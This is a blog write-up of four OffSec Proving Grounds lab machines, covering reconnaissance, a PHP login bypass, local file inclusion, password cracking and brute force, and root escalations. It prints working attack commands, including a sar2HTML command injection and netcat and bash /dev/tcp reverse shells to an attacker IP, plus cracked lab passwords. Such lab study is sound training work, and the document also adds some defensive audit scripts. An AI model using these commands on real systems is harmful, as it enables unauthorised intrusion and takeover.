OffSec PG - Potato, PyExp, Sar, Seppukku

Potato

Enumeration

Machine IP → 192.168.53.101

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.53.101

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port | Service | Other details (if any)
22 | SSH | OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80 | HTTP | Apache httpd 2.4.41 ((Ubuntu))
2112 | FTP | ProFTPd

Web Scan

GoBuster scan → gobuster dir -u http://192.168.53.101 -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • admin/
  • admin/index.php

Exploitation

Used ftp to log in to the service running on port 2112, which allowed anonymous login.

The files available were index.php.bak and welcome.msg. The backup of the index page consists of the following code →

<html>
<head></head>
<body>
<?php
$pass= "potato"; //note Change this password regularly
if($_GET['login']==="1"){
  if (strcmp($_POST['username'], "admin") == 0  && strcmp($_POST['password'], $pass) == 0) {
    echo "Welcome! <br> Go to the <a href=\"dashboard.php\">dashboard</a>";
    setcookie('pass', $pass, time() + 365*24*3600);
  }else{
    echo "<p>Bad login/password! <br> Return to the <a href=\"index.php\">login page</a> <p>";
  }
  exit();
}
?>
  <form action="index.php?login=1" method="POST">
    <h1>Login</h1>
    <label><b>User:</b></label>
    <input type="text" name="username" required>
    <br>
    <label><b>Password:</b></label>
    <input type="password" name="password" required>
    <br>
    <input type="submit" id='submit' value='Login' >
  </form>
</body>
</html>

This gives an idea about how to bypass the login on the /admin/index.php page. The strcmp($_POST['password'], $pass) == 0 check can be bypassed by changing the parameter password into password[], i.e. sending an array where a string is expected. In PHP versions before 8, strcmp() called with an array returns NULL (with a warning), and NULL == 0 is true under the loose == comparison, so the check passes. Further, the username from the code shows that the required user is admin. Intercepting the login request in Burp and changing the parameter as described makes a dashboard page at /admin/dashboard.php available.

The dashboard page has a Logs section that can retrieve logs from the system. This could have a directory traversal, i.e. LFI, vulnerability. Catching the request in Burp and changing the log file to ../../../../../../../../etc/passwd returns the /etc/passwd file, in which the users with a bash login shell are → root, florianges, webadmin.

The entry of interest is webadmin. The hash is available in the entry and seems insecure (the $1$ prefix marks md5crypt), so it can be cracked using John the Ripper. For this, the entry webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash is stored in a file test.pass and John is run as follows → john --wordlist=rockyou.txt test.pass. This revealed the output dragon, which is the password for the webadmin user.

Used the password dragon for the user webadmin for ssh as follows → ssh webadmin@192.168.53.101. This gives the user flag located in the home directory for the user.

Privilege Escalation

Searched for setuid binaries with the command → find / -perm -u=s -type f 2>/dev/null. Without a usable binary, checked allowed executions with sudo as follows → sudo -l. The result shows that the user is allowed to run /bin/nice /notes/* with sudo.

The /notes/ directory contained scripts for executing the clear and id commands. The * in the rule is a wildcard that also matches ../ sequences, so a path that starts with /notes/ but traverses out of that directory still satisfies the rule. This bypasses the intended restriction and allows bash to be executed in the elevated state.

Therefore, executing the /bin/nice command as follows → sudo /bin/nice /notes/../bin/bash gives the root shell, followed by the root flag in the root home directory.
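Why the rule accepts that path, as an added example that is not part of the original write-up: sudo matches command-line arguments against the sudoers pattern with shell-style globbing in which * also matches /, and Python's fnmatch is used here as a stand-in for that matching. The helper name audit_sudo_arg and the two constructed candidate paths are assumptions.

```python
import fnmatch
import posixpath

# Argument pattern from the sudo -l output above: /bin/nice /notes/*
RULE_ARG = "/notes/*"

def audit_sudo_arg(pattern: str, argument: str) -> dict:
    """Compare what a sudoers argument pattern accepts with where the path points."""
    # In sudoers command-line arguments '*' also matches '/', so "../" passes.
    # fnmatchcase() has the same property, which makes it a usable stand-in.
    matches = fnmatch.fnmatchcase(argument, pattern)
    # Directory the rule was meant to confine the argument to: the literal
    # part of the pattern before the first wildcard.
    prefix = pattern.split("*", 1)[0]
    # normpath() collapses ".."; symlinks are not followed in this sketch.
    resolved = posixpath.normpath(argument)
    confined = (resolved + "/").startswith(prefix)
    return {
        "argument": argument,
        "matches_rule": matches,
        "resolved": resolved,
        "escapes_directory": matches and not confined,
    }

def demo() -> list:
    candidates = (
        "/notes/id.sh",        # constructed: the intended kind of use
        "/notes/../bin/bash",  # argument used in the write-up
        "/opt/other.sh",       # constructed: not covered by the rule
    )
    return [audit_sudo_arg(RULE_ARG, c) for c in candidates]

if __name__ == "__main__":
    for row in demo():
        print(row)
```

A rule that lists each permitted script by its exact path, with no wildcard in the argument, leaves nothing for the traversal to match.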


PyExp

Enumeration

Machine IP → 192.168.63.118

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.63.118

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port | Service | Other details (if any)
1337 | SSH | OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
3306 | MySQL | MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1 → *Salt: **“(APO{@jw7JP3MgBRU_

Exploitation

MySQL can be brute-forced for the password of the user root. Used hydra for this as follows → hydra -l root -P rockyou.txt -t 4 mysql://192.168.63.118. The password was prettywoman. With the new password, looked at the MySQL databases using the following → mysql -u root -h 192.168.63.118 -p.

Looking into the mysql shell, the database is data and the table is fernet. The table has the following entry →

cred → gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=

keyy → UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=

The given key and credential are not a plain encoding such as base64 that decodes directly to text. They are in fact a Fernet key and token. The cryptography module in Python has support for Fernet encryption, so the token can be decrypted with a Python script as follows →

from cryptography.fernet import Fernet
decryptor = Fernet(b'UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=')
plaintext = decryptor.decrypt(b'gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=')
print(plaintext)

Running this as python3 decrypt.py gives the output as b'lucy:wJ9`"Lemdv9[FEw-'. These can be used as the credentials for ssh running on port 1337. Logging in to ssh with the above credentials gives the user lucy with a user flag in the home directory.
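How the two column values can be recognised as Fernet before any decryption, as an added example that is not part of the original write-up: a Fernet token is URL-safe base64 over a fixed layout (version byte 0x80, 8-byte timestamp, 16-byte IV, AES-CBC ciphertext, 32-byte HMAC), so its header can be read without the key. The function names are assumptions; the token and key are the values from the table above.

```python
import base64
import struct
from datetime import datetime, timezone

# Values of the cred and keyy columns shown above.
TOKEN = ("gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1"
         "_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=")
KEY = "UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0="

def parse_fernet_token(token: str) -> dict:
    """Split a Fernet token into its fields; no key is needed for this."""
    raw = base64.urlsafe_b64decode(token)
    if len(raw) < 1 + 8 + 16 + 16 + 32:
        raise ValueError("too short for a Fernet token")
    # Big-endian: 1 version byte followed by a 64-bit creation timestamp.
    version, timestamp = struct.unpack(">BQ", raw[:9])
    if version != 0x80:
        raise ValueError("not a Fernet token (version byte is not 0x80)")
    ciphertext = raw[25:-32]
    if len(ciphertext) % 16:
        raise ValueError("ciphertext is not a whole number of AES blocks")
    return {
        "version": version,
        "created": datetime.fromtimestamp(timestamp, tz=timezone.utc),
        "iv": raw[9:25],
        "ciphertext_len": len(ciphertext),
        "hmac": raw[-32:],
    }

def looks_like_fernet_key(key: str) -> bool:
    """A Fernet key is 32 bytes (signing half + encryption half) in URL-safe base64."""
    try:
        return len(base64.urlsafe_b64decode(key)) == 32
    except ValueError:
        return False

if __name__ == "__main__":
    info = parse_fernet_token(TOKEN)
    print(hex(info["version"]), info["created"].isoformat(), info["ciphertext_len"])
    print("key shape ok:", looks_like_fernet_key(KEY))
```

The leading gAAAAA seen in the cred column is the base64 form of the 0x80 version byte followed by the zero high bytes of the timestamp, which is why Fernet tokens are easy to spot in a database dump; a key stored in the same row gives the token no protection.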

Privilege Escalation

For privilege escalation, searched for setuid binaries using the following find command → find / -perm -u=s -type f 2>/dev/null. This does show sudo. Listing the commands that user lucy can run with sudo -l shows that the python2 binary can be called for the file /opt/exp.py.

The file contains the following code →

uinput = raw_input('how are you?')
exec(uinput)

exec() in python2 runs the string it is given as Python code. Therefore, running the above with sudo /usr/bin/python2 /opt/exp.py and giving the input import os; os.system("whoami"); returns root.

Therefore, a shell could even be spawned by changing the command, which gives the root flag in the /root/ directory.


Sar

Enumeration

Machine IP → 192.168.147.35

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.147.35

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port | Service | Other details (if any)
22 | SSH | OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80 | HTTP | Apache httpd 2.4.29 ((Ubuntu))

Web Scan

GoBuster scan → gobuster dir -u http://192.168.147.35 -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • index.html
  • robots.txt
  • phpinfo.php

robots.txt reveals a directory sar2HTML, which has an index.php page. The version of sar2HTML is 3.2.1.

Exploitation

Google-fu reveals the existence of an RCE exploit for sar2HTML version 3.2.1. With this exploit, a request to /sar2HTML/index.php?plot=;whoami executes the command, and the result can be seen on the webpage. Therefore, this was used to enumerate the presence of bash, python and netcat. The /etc/passwd file was also printed, which revealed the 2 users of importance to be root and love.

Thus, a reverse shell can be spawned using bash payload rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.147 3002 >/tmp/f for the user www-data.
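What requests of this kind look like from the server side, as an added example that is not part of the original write-up: a small detector that scans web access logs for sar2HTML plot values containing shell metacharacters. The log lines are constructed for illustration and the function name is an assumption.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed Apache access-log lines for illustration (not from the target).
SAMPLE_LOG = """\
198.51.100.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sar2HTML/index.php?plot=LINUX HTTP/1.1" 200 5120
198.51.100.9 - - [01/Jan/2024:10:00:07 +0000] "GET /sar2HTML/index.php?plot=;whoami HTTP/1.1" 200 5342
198.51.100.9 - - [01/Jan/2024:10:00:31 +0000] "GET /sar2HTML/index.php?plot=%3Bcat%20%2Fetc%2Fpasswd HTTP/1.1" 200 7011
198.51.100.7 - - [01/Jan/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 10918
"""

REQUEST = re.compile(r'^(?P<src>\S+) .*?"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+"')
# Characters that let a value break out of a shell command line.
SHELL_META = re.compile(r"[;|&`$<>\n]")

def suspicious_plot_requests(log_text: str) -> list:
    """Return (source, decoded plot value) for requests carrying shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        if not parts.path.lower().endswith("/sar2html/index.php"):
            continue
        # Split by hand: ';' must stay part of the value, not act as a separator.
        for pair in parts.query.split("&"):
            name, _, value = pair.partition("=")
            value = unquote_plus(value)  # %3B is decoded to ';' before matching
            if unquote_plus(name) == "plot" and SHELL_META.search(value):
                hits.append((m.group("src"), value))
    return hits

if __name__ == "__main__":
    for src, value in suspicious_plot_requests(SAMPLE_LOG):
        print(f"{src} sent plot={value!r}")
```

Access logs only record the query string, so a plot value sent in a POST body needs a WAF or application-level log to be seen.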

The user flag was in the /home/ directory.

Privilege Escalation

Looking at setuid binaries, the most interesting ones are arping and ping. Looking at the crontab, there is a process that runs every 5 mins as the root user → cd /var/www/html/ && sudo ./finally.sh. Checking the code of the file, it seems that it runs another file called write.sh, which is world writable.

Therefore, a reverse shell payload placed in write.sh would be executed as root by the cron job, thereby giving a root shell.

This can be done via echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.49.147/3003 0>&1'" >> write.sh. This gives a shell in 5 minutes. Subsequently, it also gives the root flag.
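The misconfiguration behind this step, checked from the administrator's side, as an added example that is not part of the original write-up: starting from a root cron command, follow every script it runs, including scripts called by those scripts, and report any that are world-writable. The function name and the temporary-directory layout are constructed for the demonstration.

```python
import os
import re
import stat
import tempfile

CD = re.compile(r"\bcd\s+(\S+)")
# A path ending in .sh that is not part of a longer path-like word.
SCRIPT = re.compile(r"(?<![\w./-])([\w./-]+\.sh)\b")

def audit_root_job(command: str, cwd: str = "/", seen=None) -> list:
    """Return scripts reachable from a root cron command that any user can modify."""
    seen = set() if seen is None else seen
    cd = CD.search(command)
    if cd:  # "cd DIR && ..." sets the directory relative paths resolve in
        cwd = os.path.join(cwd, cd.group(1))
    findings = []
    for ref in SCRIPT.findall(command):
        path = os.path.normpath(os.path.join(cwd, ref))
        if path in seen or not os.path.isfile(path):
            continue
        seen.add(path)
        if os.stat(path).st_mode & stat.S_IWOTH:
            findings.append(path)
        with open(path, errors="replace") as fh:
            # Follow scripts this script calls in turn (finally.sh -> write.sh).
            findings += audit_root_job(fh.read(), cwd, seen)
    return findings

def demo() -> list:
    # Constructed copy of the layout described above, built in a temp directory.
    files = (("finally.sh", "#!/bin/sh\n./write.sh\n", 0o755),
             ("write.sh", "#!/bin/sh\necho done\n", 0o777))
    with tempfile.TemporaryDirectory() as web:
        for name, body, mode in files:
            path = os.path.join(web, name)
            with open(path, "w") as fh:
                fh.write(body)
            os.chmod(path, mode)
        found = audit_root_job(f"cd {web}/ && sudo ./finally.sh")
    return [os.path.basename(p) for p in found]

if __name__ == "__main__":
    print(demo())
```

finally.sh itself passes the permission check; the finding only appears because the audit follows the call into write.sh.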


Seppukku

Enumeration

Machine IP → 192.168.244.90

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.141.90

OS Detection → os_info

Port | Service | Other details (if any)
21 | FTP | vsftpd 3.0.3
22 | SSH | OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80 | HTTP | nginx 1.14.2
139 | NETBIOS-SSN | Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445 | MICROSOFT-DS | Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080 | SSL/EMPOWERID | LiteSpeed
7601 | HTTP | Apache httpd 2.4.38 ((Debian))
8088 | HTTP | LiteSpeed httpd

Web Scan

GoBuster scan → /opt/gobuster dir -u http://192.168.141.90 -f -w /opt/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • /index.html
  • /icons/
  • /b/
  • /a/
  • /c/
  • /t/
  • /r/
  • /d/
  • /e/
  • /f/
  • /h/
  • /w/
  • /q/
  • /database/
  • /production/
  • /keys/
  • /secret/

The directories /w/, secret and keys contain several interesting files →

  • ssh private keys within private and private.bak
  • hostname file with value seppuku
  • a wordlist password.lst
  • passwd.bak and shadow.bak

Exploitation

The wordlist can be used to brute force the ssh login by using hydra as follows →

hydra -l seppuku -P password.lst ssh://192.168.141.90

This gives the valid credentials as seppuku:eeyoree, which can be used to log in to the machine. This also gives the user flag within local.txt in the home directory.

Other items such as the backup for the password and shadow files were rabbit holes due to incorrectly formatted hashes.

Privilege Escalation

User

Listing the users in the /home directory gives other users as samurai and tanto. The ssh private keys discovered earlier grant access to user tanto via ssh. This leads us to a restricted shell. The sudo -l permissions for the user were to only create a symbolic link of the /root directory inside /tmp. However, this directory would still have the permissions of root which means those permissions are still needed to read the root flag.

The user directory also contains a .passwd file which contains a password. This password allows logging in with the credentials samurai:12345685213456!@!@A for the next user. The sudo -l capability for this user is to run the following command →

/../../../../../../home/tanto/.cgi_bin/bin /tmp/*

This means that sudo executes the file /home/tanto/.cgi_bin/bin as the command, with /tmp/* as its argument.

Root

The file bin can be replaced with anything, and the replacement will get executed. This can be done with a shell script of the same name, which can be created on the machine using nano as well as served via HTTP from the attacker host to the tanto machine using wget. The file should contain the following →

#!/bin/bash

/bin/bash

This can then be made world executable by using chmod 777 bin and then moved inside the .cgi_bin directory. samurai can then use the command with sudo to execute this file which would then grant a root shell and thus the root flag.


This post is licensed under CC BY 4.0 by the author.